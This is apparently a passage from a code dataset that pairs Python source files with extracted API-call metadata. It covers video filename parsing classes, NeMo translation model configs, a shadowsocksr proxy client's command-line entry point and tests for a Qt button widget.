3597), True, 'import matplotlib.pyplot as plt\n'), ((3598, 3610), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (3608, 3610), True, 'import matplotlib.pyplot as plt\n'), ((3612, 3622), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3620, 3622), True, 'import matplotlib.pyplot as plt\n'), ((3631, 3640), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (3638, 3640), True, 'import matplotlib.pyplot as plt\n'), ((3733, 3782), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'acc', '"""bo"""'], {'label': '"""Training acc"""'}), "(epochs, acc, 'bo', label='Training acc')\n", (3741, 3782), True, 'import matplotlib.pyplot as plt\n'), ((3783, 3837), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_acc', '"""b"""'], {'label': '"""Validation acc"""'}), "(epochs, val_acc, 'b', label='Validation acc')\n", (3791, 3837), True, 'import matplotlib.pyplot as plt\n'), ((3838, 3883), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation accuracy"""'], {}), "('Training and validation accuracy')\n", (3847, 3883), True, 'import matplotlib.pyplot as plt\n'), ((3884, 3904), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Epochs"""'], {}), "('Epochs')\n", (3894, 3904), True, 'import matplotlib.pyplot as plt\n'), ((3905, 3927), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Accuracy"""'], {}), "('Accuracy')\n", (3915, 3927), True, 'import matplotlib.pyplot as plt\n'), ((3928, 3940), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (3938, 3940), True, 'import matplotlib.pyplot as plt\n'), ((3942, 3952), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3950, 3952), True, 'import matplotlib.pyplot as plt\n'), ((2090, 2128), 'tensorflow.keras.layers.Embedding', 'keras.layers.Embedding', (['vocab_size', '(16)'], {}), '(vocab_size, 
16)\n', (2112, 2128), False, 'from tensorflow import keras\n'), ((2140, 2177), 'tensorflow.keras.layers.GlobalAveragePooling1D', 'keras.layers.GlobalAveragePooling1D', ([], {}), '()\n', (2175, 2177), False, 'from tensorflow import keras\n'), ((2189, 2234), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(16)'], {'activation': 'tf.nn.relu'}), '(16, activation=tf.nn.relu)\n', (2207, 2234), False, 'from tensorflow import keras\n'), ((2246, 2293), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': 'tf.nn.sigmoid'}), '(1, activation=tf.nn.sigmoid)\n', (2264, 2293), False, 'from tensorflow import keras\n'), ((2337, 2361), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {}), '()\n', (2359, 2361), True, 'import tensorflow as tf\n')] |
# -*- coding: utf-8 -*-
from __future__ import division
from datetime import datetime, timedelta
import logging
import os
from guessit import guessit
logger = logging.getLogger(__name__)
#: Video extensions
VIDEO_EXTENSIONS = ('.3g2', '.3gp', '.3gp2', '.3gpp', '.60d', '.ajp', '.asf', '.asx', '.avchd', '.avi', '.bik',
'.bix', '.box', '.cam', '.dat', '.divx', '.dmf', '.dv', '.dvr-ms', '.evo', '.flc', '.fli',
'.flic', '.flv', '.flx', '.gvi', '.gvp', '.h264', '.m1v', '.m2p', '.m2ts', '.m2v', '.m4e',
'.m4v', '.mjp', '.mjpeg', '.mjpg', '.mkv', '.moov', '.mov', '.movhd', '.movie', '.movx', '.mp4',
                    '.mpe', '.mpeg', '.mpg', '.mpv', '.mpv2', '.mxf', '.nsv', '.nut', '.ogg', '.ogm', '.ogv', '.omf',
'.ps', '.qt', '.ram', '.rm', '.rmvb', '.swf', '.ts', '.vfw', '.vid', '.video', '.viv', '.vivo',
'.vob', '.vro', '.wm', '.wmv', '.wmx', '.wrap', '.wvx', '.wx', '.x264', '.xvid')
class Video(object):
"""Base class for videos.
Represent a video, existing or not.
:param str name: name or path of the video.
:param str format: format of the video (HDTV, WEB-DL, BluRay, ...).
:param str release_group: release group of the video.
:param str resolution: resolution of the video stream (480p, 720p, 1080p or 1080i).
:param str video_codec: codec of the video stream.
:param str audio_codec: codec of the main audio stream.
:param str imdb_id: IMDb id of the video.
:param dict hashes: hashes of the video file by provider names.
:param int size: size of the video file in bytes.
:param set subtitle_languages: existing subtitle languages.
"""
def __init__(self, name, format=None, release_group=None, resolution=None, video_codec=None, audio_codec=None,
imdb_id=None, hashes=None, size=None, subtitle_languages=None):
#: Name or path of the video
self.name = name
#: Format of the video (HDTV, WEB-DL, BluRay, ...)
self.format = format
#: Release group of the video
self.release_group = release_group
#: Resolution of the video stream (480p, 720p, 1080p or 1080i)
self.resolution = resolution
#: Codec of the video stream
self.video_codec = video_codec
#: Codec of the main audio stream
self.audio_codec = audio_codec
#: IMDb id of the video
self.imdb_id = imdb_id
#: Hashes of the video file by provider names
self.hashes = hashes or {}
#: Size of the video file in bytes
self.size = size
#: Existing subtitle languages
self.subtitle_languages = subtitle_languages or set()
@property
def exists(self):
"""Test whether the video exists"""
return os.path.exists(self.name)
@property
def age(self):
"""Age of the video"""
if self.exists:
return datetime.utcnow() - datetime.utcfromtimestamp(os.path.getmtime(self.name))
return timedelta()
@classmethod
def fromguess(cls, name, guess):
"""Create an :class:`Episode` or a :class:`Movie` with the given `name` based on the `guess`.
:param str name: name of the video.
:param dict guess: guessed data.
:raise: :class:`ValueError` if the `type` of the `guess` is invalid
"""
if guess['type'] == 'episode':
return Episode.fromguess(name, guess)
if guess['type'] == 'movie':
return Movie.fromguess(name, guess)
raise ValueError('The guess must be an episode or a movie guess')
@classmethod
def fromname(cls, name, options=None):
"""Shortcut for :meth:`fromguess` with a `guess` guessed from the `name`.
:param str name: name of the video.
"""
if options is not None:
return cls.fromguess(name, guessit(name, options=options))
else:
return cls.fromguess(name, guessit(name))
def __repr__(self):
return '<%s [%r]>' % (self.__class__.__name__, self.name)
def __hash__(self):
return hash(self.name)
class Episode(Video):
"""Episode :class:`Video`.
:param str series: series of the episode.
:param int season: season number of the episode.
:param int episode: episode number of the episode.
:param str title: title of the episode.
:param int year: year of the series.
:param bool original_series: whether the series is the first with this name.
:param int tvdb_id: TVDB id of the episode.
:param \*\*kwargs: additional parameters for the :class:`Video` constructor.
"""
def __init__(self, name, series, season, episode, title=None, year=None, original_series=True, tvdb_id=None,
series_tvdb_id=None, series_imdb_id=None, **kwargs):
super(Episode, self).__init__(name, **kwargs)
#: Series of the episode
self.series = series
#: Season number of the episode
self.season = season
#: Episode number of the episode
self.episode = episode
#: Title of the episode
self.title = title
#: Year of series
self.year = year
#: The series is the first with this name
self.original_series = original_series
#: TVDB id of the episode
self.tvdb_id = tvdb_id
#: TVDB id of the series
self.series_tvdb_id = series_tvdb_id
#: IMDb id of the series
self.series_imdb_id = series_imdb_id
@classmethod
def fromguess(cls, name, guess):
if guess['type'] != 'episode':
raise ValueError('The guess must be an episode guess')
if 'title' not in guess or 'episode' not in guess:
raise ValueError('Insufficient data to process the guess')
return cls(name, guess['title'], guess.get('season', 1), guess['episode'], title=guess.get('episode_title'),
year=guess.get('year'), format=guess.get('format'), original_series='year' not in guess,
release_group=guess.get('release_group'), resolution=guess.get('screen_size'),
video_codec=guess.get('video_codec'), audio_codec=guess.get('audio_codec'))
@classmethod
def fromname(cls, name):
return cls.fromguess(name, guessit(name, {'type': 'episode'}))
def __repr__(self):
if self.year is None:
return '<%s [%r, %dx%d]>' % (self.__class__.__name__, self.series, self.season, self.episode)
return '<%s [%r, %d, %dx%d]>' % (self.__class__.__name__, self.series, self.year, self.season, self.episode)
class Movie(Video):
"""Movie :class:`Video`.
:param str title: title of the movie.
:param int year: year of the movie.
:param \*\*kwargs: additional parameters for the :class:`Video` constructor.
"""
def __init__(self, name, title, year=None, **kwargs):
super(Movie, self).__init__(name, **kwargs)
#: Title of the movie
self.title = title
#: Year of the movie
self.year = year
@classmethod
def fromguess(cls, name, guess):
if guess['type'] != 'movie':
raise ValueError('The guess must be a movie guess')
if 'title' not in guess:
raise ValueError('Insufficient data to process the guess')
return cls(name, guess['title'], format=guess.get('format'), release_group=guess.get('release_group'),
resolution=guess.get('screen_size'), video_codec=guess.get('video_codec'),
audio_codec=guess.get('audio_codec'), year=guess.get('year'))
@classmethod
def fromname(cls, name):
return cls.fromguess(name, guessit(name, {'type': 'movie'}))
def __repr__(self):
if self.year is None:
return '<%s [%r]>' % (self.__class__.__name__, self.title)
return '<%s [%r, %d]>' % (self.__class__.__name__, self.title, self.year)
| [
"logging.getLogger",
"os.path.exists",
"datetime.datetime.utcnow",
"os.path.getmtime",
"datetime.timedelta",
"guessit.guessit"
]
| [((161, 188), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (178, 188), False, 'import logging\n'), ((2830, 2855), 'os.path.exists', 'os.path.exists', (['self.name'], {}), '(self.name)\n', (2844, 2855), False, 'import os\n'), ((3055, 3066), 'datetime.timedelta', 'timedelta', ([], {}), '()\n', (3064, 3066), False, 'from datetime import datetime, timedelta\n'), ((6352, 6386), 'guessit.guessit', 'guessit', (['name', "{'type': 'episode'}"], {}), "(name, {'type': 'episode'})\n", (6359, 6386), False, 'from guessit import guessit\n'), ((7744, 7776), 'guessit.guessit', 'guessit', (['name', "{'type': 'movie'}"], {}), "(name, {'type': 'movie'})\n", (7751, 7776), False, 'from guessit import guessit\n'), ((2964, 2981), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (2979, 2981), False, 'from datetime import datetime, timedelta\n'), ((3921, 3951), 'guessit.guessit', 'guessit', (['name'], {'options': 'options'}), '(name, options=options)\n', (3928, 3951), False, 'from guessit import guessit\n'), ((4006, 4019), 'guessit.guessit', 'guessit', (['name'], {}), '(name)\n', (4013, 4019), False, 'from guessit import guessit\n'), ((3010, 3037), 'os.path.getmtime', 'os.path.getmtime', (['self.name'], {}), '(self.name)\n', (3026, 3037), False, 'import os\n')] |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import Any, Optional, Tuple
from omegaconf.omegaconf import MISSING
from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig
from nemo.collections.nlp.models.enc_dec_nlp_model import EncDecNLPModelConfig
from nemo.collections.nlp.modules.common.token_classifier import TokenClassifierConfig
from nemo.collections.nlp.modules.common.tokenizer_utils import TokenizerConfig
from nemo.collections.nlp.modules.common.transformer.transformer import (
NeMoTransformerConfig,
NeMoTransformerEncoderConfig,
)
from nemo.core.config.modelPT import ModelConfig, OptimConfig, SchedConfig
@dataclass
class MTSchedConfig(SchedConfig):
name: str = 'InverseSquareRootAnnealing'
warmup_ratio: Optional[float] = None
last_epoch: int = -1
# TODO: Refactor this dataclass to support more optimizers (it pins the optimizer to Adam-like optimizers).
@dataclass
class MTOptimConfig(OptimConfig):
name: str = 'adam'
lr: float = 1e-3
betas: Tuple[float, float] = (0.9, 0.98)
weight_decay: float = 0.0
sched: Optional[MTSchedConfig] = MTSchedConfig()
@dataclass
class MTEncDecModelConfig(EncDecNLPModelConfig):
# machine translation configurations
num_val_examples: int = 3
num_test_examples: int = 3
max_generation_delta: int = 10
label_smoothing: Optional[float] = 0.0
beam_size: int = 4
len_pen: float = 0.0
src_language: str = 'en'
tgt_language: str = 'en'
find_unused_parameters: Optional[bool] = True
shared_tokenizer: Optional[bool] = True
preproc_out_dir: Optional[str] = None
# network architecture configuration
encoder_tokenizer: Any = MISSING
encoder: Any = MISSING
decoder_tokenizer: Any = MISSING
decoder: Any = MISSING
head: TokenClassifierConfig = TokenClassifierConfig(log_softmax=True)
# dataset configurations
train_ds: Optional[TranslationDataConfig] = TranslationDataConfig(
src_file_name=MISSING,
tgt_file_name=MISSING,
tokens_in_batch=512,
clean=True,
shuffle=True,
cache_ids=False,
use_cache=False,
)
validation_ds: Optional[TranslationDataConfig] = TranslationDataConfig(
src_file_name=MISSING,
tgt_file_name=MISSING,
tokens_in_batch=512,
clean=False,
shuffle=False,
cache_ids=False,
use_cache=False,
)
test_ds: Optional[TranslationDataConfig] = TranslationDataConfig(
src_file_name=MISSING,
tgt_file_name=MISSING,
tokens_in_batch=512,
clean=False,
shuffle=False,
cache_ids=False,
use_cache=False,
)
optim: Optional[OptimConfig] = MTOptimConfig()
@dataclass
class AAYNBaseConfig(MTEncDecModelConfig):
# Attention is All You Need Base Configuration
encoder_tokenizer: TokenizerConfig = TokenizerConfig(library='yttm')
decoder_tokenizer: TokenizerConfig = TokenizerConfig(library='yttm')
encoder: NeMoTransformerEncoderConfig = NeMoTransformerEncoderConfig(
library='nemo',
model_name=None,
pretrained=False,
hidden_size=512,
inner_size=2048,
num_layers=6,
num_attention_heads=8,
ffn_dropout=0.1,
attn_score_dropout=0.1,
attn_layer_dropout=0.1,
)
decoder: NeMoTransformerConfig = NeMoTransformerConfig(
library='nemo',
model_name=None,
pretrained=False,
inner_size=2048,
num_layers=6,
num_attention_heads=8,
ffn_dropout=0.1,
attn_score_dropout=0.1,
attn_layer_dropout=0.1,
)
| [
"nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerEncoderConfig",
"nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerConfig",
"nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig",
"nemo.collections.nlp.modules.common.token_classifier.TokenClassifierConfig",
"nemo.collections.nlp.modules.common.tokenizer_utils.TokenizerConfig"
]
| [((2471, 2510), 'nemo.collections.nlp.modules.common.token_classifier.TokenClassifierConfig', 'TokenClassifierConfig', ([], {'log_softmax': '(True)'}), '(log_softmax=True)\n', (2492, 2510), False, 'from nemo.collections.nlp.modules.common.token_classifier import TokenClassifierConfig\n'), ((2589, 2745), 'nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig', 'TranslationDataConfig', ([], {'src_file_name': 'MISSING', 'tgt_file_name': 'MISSING', 'tokens_in_batch': '(512)', 'clean': '(True)', 'shuffle': '(True)', 'cache_ids': '(False)', 'use_cache': '(False)'}), '(src_file_name=MISSING, tgt_file_name=MISSING,\n tokens_in_batch=512, clean=True, shuffle=True, cache_ids=False,\n use_cache=False)\n', (2610, 2745), False, 'from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig\n'), ((2854, 3012), 'nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig', 'TranslationDataConfig', ([], {'src_file_name': 'MISSING', 'tgt_file_name': 'MISSING', 'tokens_in_batch': '(512)', 'clean': '(False)', 'shuffle': '(False)', 'cache_ids': '(False)', 'use_cache': '(False)'}), '(src_file_name=MISSING, tgt_file_name=MISSING,\n tokens_in_batch=512, clean=False, shuffle=False, cache_ids=False,\n use_cache=False)\n', (2875, 3012), False, 'from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig\n'), ((3115, 3273), 'nemo.collections.nlp.data.machine_translation.machine_translation_dataset.TranslationDataConfig', 'TranslationDataConfig', ([], {'src_file_name': 'MISSING', 'tgt_file_name': 'MISSING', 'tokens_in_batch': '(512)', 'clean': '(False)', 'shuffle': '(False)', 'cache_ids': '(False)', 'use_cache': '(False)'}), '(src_file_name=MISSING, tgt_file_name=MISSING,\n tokens_in_batch=512, clean=False, shuffle=False, cache_ids=False,\n use_cache=False)\n', (3136, 3273), False, 'from nemo.collections.nlp.data.machine_translation.machine_translation_dataset import TranslationDataConfig\n'), ((3529, 3560), 'nemo.collections.nlp.modules.common.tokenizer_utils.TokenizerConfig', 'TokenizerConfig', ([], {'library': '"""yttm"""'}), "(library='yttm')\n", (3544, 3560), False, 'from nemo.collections.nlp.modules.common.tokenizer_utils import TokenizerConfig\n'), ((3602, 3633), 'nemo.collections.nlp.modules.common.tokenizer_utils.TokenizerConfig', 'TokenizerConfig', ([], {'library': '"""yttm"""'}), "(library='yttm')\n", (3617, 3633), False, 'from nemo.collections.nlp.modules.common.tokenizer_utils import TokenizerConfig\n'), ((3679, 3907), 'nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerEncoderConfig', 'NeMoTransformerEncoderConfig', ([], {'library': '"""nemo"""', 'model_name': 'None', 'pretrained': '(False)', 'hidden_size': '(512)', 'inner_size': '(2048)', 'num_layers': '(6)', 'num_attention_heads': '(8)', 'ffn_dropout': '(0.1)', 'attn_score_dropout': '(0.1)', 'attn_layer_dropout': '(0.1)'}), "(library='nemo', model_name=None, pretrained=\n False, hidden_size=512, inner_size=2048, num_layers=6,\n num_attention_heads=8, ffn_dropout=0.1, attn_score_dropout=0.1,\n attn_layer_dropout=0.1)\n", (3707, 3907), False, 'from nemo.collections.nlp.modules.common.transformer.transformer import NeMoTransformerConfig, NeMoTransformerEncoderConfig\n'), ((4020, 4219), 'nemo.collections.nlp.modules.common.transformer.transformer.NeMoTransformerConfig', 'NeMoTransformerConfig', ([], {'library': '"""nemo"""', 'model_name': 'None', 'pretrained': 
'(False)', 'inner_size': '(2048)', 'num_layers': '(6)', 'num_attention_heads': '(8)', 'ffn_dropout': '(0.1)', 'attn_score_dropout': '(0.1)', 'attn_layer_dropout': '(0.1)'}), "(library='nemo', model_name=None, pretrained=False,\n inner_size=2048, num_layers=6, num_attention_heads=8, ffn_dropout=0.1,\n attn_score_dropout=0.1, attn_layer_dropout=0.1)\n", (4041, 4219), False, 'from nemo.collections.nlp.modules.common.transformer.transformer import NeMoTransformerConfig, NeMoTransformerEncoderConfig\n')] |
"""
@author: tyrantlucifer
@contact: <EMAIL>
@blog: https://tyrantlucifer.com
@file: main.py
@time: 2021/2/18 21:36
@desc: entry point for shadowsocksr-cli
"""
import argparse
import traceback
from shadowsocksr_cli.functions import *
def get_parser():
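    # build the argument parser exposing all CLI actions of the client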
parser = argparse.ArgumentParser(description=color.blue("The shadowsocksr command client based Python."),
epilog=color.yellow('Powered by ') + color.green('tyrantlucifer') + color.yellow(
". If you have any questions,you can send e-mails to ") + color.green(
"<EMAIL>"))
parser.add_argument("-l", "--list", action="store_true", help="show ssr list")
parser.add_argument("-p", "--port", default=1080, metavar="local_port", type=int,
help="assign local proxy port,use with -s")
parser.add_argument("-s", "--start", metavar="ssr_id", type=int, help="start ssr proxy")
parser.add_argument("-S", "--stop", nargs='?', const=-1, metavar="ssr_id", type=int, help="stop ssr proxy")
parser.add_argument("-u", "--update", action="store_true", help="update ssr list")
parser.add_argument("-v", "--version", action="store_true", help="display version")
parser.add_argument("--generate-clash", action="store_true", help="generate clash config yaml")
parser.add_argument("--display-json", metavar="ssr_id", type=int, help="display ssr json info")
parser.add_argument("--test-speed", type=int, metavar="ssr_id", help="test ssr nodes download and upload speed")
parser.add_argument("--fast-node", action="store_true", help="find most fast by delay and start ssr proxy")
parser.add_argument("--setting-url", metavar="ssr_subscribe_url", help="setting ssr subscribe url")
parser.add_argument("--setting-address", metavar="ssr_local_address", help="setting ssr local address")
parser.add_argument("--list-url", action="store_true", help="list ssr subscribe url")
parser.add_argument("--add-url", metavar="ssr_subscribe_url", help="add ssr subscribe url")
parser.add_argument("--remove-url", metavar="ssr_subscribe_url", help="remove ssr subscribe url")
parser.add_argument("--list-address", action="store_true", help="list ssr local address")
parser.add_argument("--parse-url", metavar="ssr_url", help="pares ssr url")
parser.add_argument("--append-ssr", metavar="ssr_file_path", help="append ssr nodes from file")
parser.add_argument("-b", action="store_true", help="append_ssr file is base64")
parser.add_argument("--clear-ssr", metavar="ssr_id", nargs="?", const="fail",
help="if ssr_id is not empty, clear ssr node by ssr_id, else clear fail nodes")
parser.add_argument("-all", action="store_true", help="clear all ssr node")
parser.add_argument("--add-ssr", metavar="ssr_url", help="add ssr node")
parser.add_argument("--test-again", metavar="ssr_node_id", type=int, help="test ssr node again")
parser.add_argument("--print-qrcode", metavar="ssr_node_id", type=int, help="print ssr node qrcode")
parser.add_argument("--http", metavar="action[start stop status]", help="Manager local http server")
parser.add_argument("--http-port", metavar="http server port", default=80, type=int,
help="assign local http server port")
parser.add_argument("--setting-global-proxy", action="store_true",
help="setting system global proxy,only support on " + color.red('Ubuntu Desktop'))
parser.add_argument("--setting-pac-proxy", action="store_true",
help="setting system pac proxy,only support on " + color.red('Ubuntu Desktop'))
parser.add_argument("--close-system-proxy", action="store_true",
help="close system proxy,only support on " + color.red('Ubuntu Desktop'))
return parser
def main():
parser = get_parser()
args = parser.parse_args()
if args.list:
DisplayShadowsocksr.display_shadowsocksr_list()
elif args.update:
UpdateConfigurations.update_subscribe()
elif args.fast_node:
HandleShadowsocksr.select_fast_node(args.port)
elif args.start is not None:
HandleShadowsocksr.start(ssr_id=args.start, local_port=args.port)
elif args.stop is not None:
HandleShadowsocksr.stop(ssr_id=args.stop, local_port=args.port)
elif args.version:
DisplayShadowsocksr.display_version()
elif args.setting_url:
UpdateConfigurations.reset_subscribe_url(args.setting_url)
elif args.append_ssr:
if not os.path.isfile(args.append_ssr):
logger.error(f'append_ssr file {args.append_ssr} is not exists')
return
with open(args.append_ssr, 'r', encoding='UTF-8') as f:
txt = f.read()
if args.b:
txt = ParseShadowsocksr.base64_decode(txt)
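        # collect every unique ssr:// link found in the file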
ssr_set = set()
for line in txt.splitlines():
for ssr in re.findall(r'ssr://[0-9a-zA-Z=-_/+]+', line):
ssr_set.add(ssr)
for ssr in ssr_set:
try:
UpdateConfigurations.append_ssr_node(ssr)
except Exception as e:
logger.error(f'add ssr node error {ssr}')
logger.error(traceback.format_exc())
elif args.clear_ssr:
UpdateConfigurations.clear_ssr_nodes(args.clear_ssr, args.all)
elif args.setting_address:
UpdateConfigurations.update_local_address(args.setting_address)
elif args.list_url:
DisplayShadowsocksr.display_subscribe_url()
elif args.add_url:
UpdateConfigurations.add_subscribe_url(args.add_url)
elif args.remove_url:
UpdateConfigurations.remove_subscribe_url(args.remove_url)
elif args.list_address:
DisplayShadowsocksr.display_local_address()
elif args.parse_url:
DisplayShadowsocksr.display_shadowsocksr_json_by_url(args.parse_url)
elif args.add_ssr:
UpdateConfigurations.add_shadowsocksr_by_url(args.add_ssr)
elif args.test_again is not None:
UpdateConfigurations.update_shadowsocksr_connect_status(ssr_id=args.test_again)
elif args.print_qrcode is not None:
DisplayShadowsocksr.display_qrcode(ssr_id=args.print_qrcode)
elif args.setting_global_proxy:
UpdateSystemProxy.open_global_proxy(args.port, args.http_port)
elif args.setting_pac_proxy:
UpdateSystemProxy.open_pac_proxy(args.port, args.http_port)
elif args.close_system_proxy:
UpdateSystemProxy.close_proxy(args.port, args.http_port)
elif args.test_speed is not None:
DisplayShadowsocksr.display_shadowsocksr_speed(ssr_id=args.test_speed)
elif args.display_json is not None:
DisplayShadowsocksr.display_shadowsocksr_json(ssr_id=args.display_json)
elif args.generate_clash:
GenerateClashConfig.generate_clash_config()
elif args.http:
HandleHttpServer.handle_http_server(args.http, args.port, args.http_port)
else:
parser.print_help()
if __name__ == "__main__":
main()
| [
"traceback.format_exc"
]
| [((5276, 5298), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (5296, 5298), False, 'import traceback\n')] |
import os
import sys
import pytest
from msl.qt import convert, Button, QtWidgets, QtCore, Qt
def test_text():
b = Button(text='hello')
assert b.text() == 'hello'
assert b.icon().isNull()
assert b.toolButtonStyle() == Qt.ToolButtonTextOnly
def test_icon():
path = os.path.dirname(__file__) + '/gamma.png'
gamma_size = QtCore.QSize(191, 291)
int_val = QtWidgets.QStyle.SP_DriveNetIcon
icon = convert.to_qicon(int_val)
sizes = icon.availableSizes()
if sys.platform == 'win32':
assert len(sizes) > 1
b = Button(icon=int_val)
assert b.text() == ''
assert not b.icon().isNull()
assert b.iconSize() == sizes[0]
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
b = Button(icon=path)
assert b.text() == ''
assert not b.icon().isNull()
assert b.iconSize() == gamma_size
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
b = Button(icon=convert.icon_to_base64(convert.to_qicon(path)))
assert b.text() == ''
assert not b.icon().isNull()
assert b.iconSize() == gamma_size
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
def test_icon_size():
int_val = QtWidgets.QStyle.SP_DriveNetIcon
icon = convert.to_qicon(int_val)
sizes = icon.availableSizes()
if sys.platform == 'win32':
assert len(sizes) > 1
#
# specify the size to the get_icon function
#
b = Button(icon=convert.to_qicon(int_val))
assert b.text() == ''
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
assert b.iconSize() == sizes[0]
b = Button(icon=convert.to_qicon(int_val, size=789))
assert b.iconSize() == QtCore.QSize(789, 789)
b = Button(icon=convert.to_qicon(int_val, size=3.0))
# specifying a scale factor will use the largest available size
assert b.iconSize() == QtCore.QSize(3*sizes[-1].width(), 3*sizes[-1].height())
b = Button(icon=convert.to_qicon(int_val, size=QtCore.QSize(50, 50)))
assert b.iconSize() == QtCore.QSize(50, 50)
for size in [(256,), (256, 256, 256)]:
with pytest.raises(ValueError, match='(width, height)'):
Button(icon=convert.to_qicon(int_val, size=size))
#
# use the icon_size kwarg
#
b = Button(icon=convert.to_qicon(int_val), icon_size=1234)
assert b.iconSize() == QtCore.QSize(1234, 1234)
b = Button(icon=convert.to_qicon(int_val), icon_size=3.0)
# specifying a scale factor will use the largest available size
assert b.iconSize() == QtCore.QSize(3*sizes[-1].width(), 3*sizes[-1].height())
b = Button(icon=convert.to_qicon(int_val), icon_size=(312, 312))
assert b.iconSize() == QtCore.QSize(312, 312)
b = Button(icon=convert.to_qicon(int_val), icon_size=QtCore.QSize(500, 500))
assert b.iconSize() == QtCore.QSize(500, 500)
for size in [(256,), (256, 256, 256)]:
with pytest.raises(ValueError, match='(width, height)'):
Button(icon=convert.to_qicon(int_val), icon_size=size)
def test_text_and_icon():
b = Button(text='hello', icon=QtWidgets.QStyle.SP_DriveNetIcon)
assert b.text() == 'hello'
assert not b.icon().isNull()
assert b.toolButtonStyle() == Qt.ToolButtonTextUnderIcon
b = Button(text='world', icon=QtWidgets.QStyle.SP_DriveNetIcon, is_text_under_icon=False)
assert b.text() == 'world'
assert not b.icon().isNull()
assert b.toolButtonStyle() == Qt.ToolButtonTextBesideIcon
def test_tooltip():
b = Button(tooltip='hello')
assert b.text() == ''
assert b.icon().isNull()
assert b.toolTip() == 'hello'
assert b.toolButtonStyle() == Qt.ToolButtonIconOnly
| [
"msl.qt.convert.to_qicon",
"os.path.dirname",
"msl.qt.QtCore.QSize",
"msl.qt.Button",
"pytest.raises"
]
| [((122, 142), 'msl.qt.Button', 'Button', ([], {'text': '"""hello"""'}), "(text='hello')\n", (128, 142), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((347, 369), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(191)', '(291)'], {}), '(191, 291)\n', (359, 369), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((429, 454), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (445, 454), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((560, 580), 'msl.qt.Button', 'Button', ([], {'icon': 'int_val'}), '(icon=int_val)\n', (566, 580), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((741, 758), 'msl.qt.Button', 'Button', ([], {'icon': 'path'}), '(icon=path)\n', (747, 758), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1216, 1241), 'msl.qt.convert.to_qicon', 'convert.to_qicon', (['int_val'], {}), '(int_val)\n', (1232, 1241), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((3013, 3072), 'msl.qt.Button', 'Button', ([], {'text': '"""hello"""', 'icon': 'QtWidgets.QStyle.SP_DriveNetIcon'}), "(text='hello', icon=QtWidgets.QStyle.SP_DriveNetIcon)\n", (3019, 3072), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((3207, 3296), 'msl.qt.Button', 'Button', ([], {'text': '"""world"""', 'icon': 'QtWidgets.QStyle.SP_DriveNetIcon', 'is_text_under_icon': '(False)'}), "(text='world', icon=QtWidgets.QStyle.SP_DriveNetIcon,\n is_text_under_icon=False)\n", (3213, 3296), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((3449, 3472), 'msl.qt.Button', 'Button', ([], {'tooltip': '"""hello"""'}), "(tooltip='hello')\n", (3455, 3472), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((289, 314), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (304, 314), False, 'import os\n'), ((1650, 1672), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(789)', '(789)'], {}), '(789, 789)\n', (1662, 1672), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((1984, 2004), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(50)', '(50)'], {}), '(50, 50)\n', (1996, 2004), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2310, 2334), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(1234)', '(1234)'], {}), '(1234, 1234)\n', (2322, 2334), False, 'from msl.qt import convert, Button, QtWidgets, QtCore, Qt\n'), ((2646, 2668), 'msl.qt.QtCore.QSize', 'QtCore.QSize', (['(312)', '(312)'], {}), '(312, 312)\n', (2658, 2668), False, 'from msl.qt import convert, Button, QtWidgets, 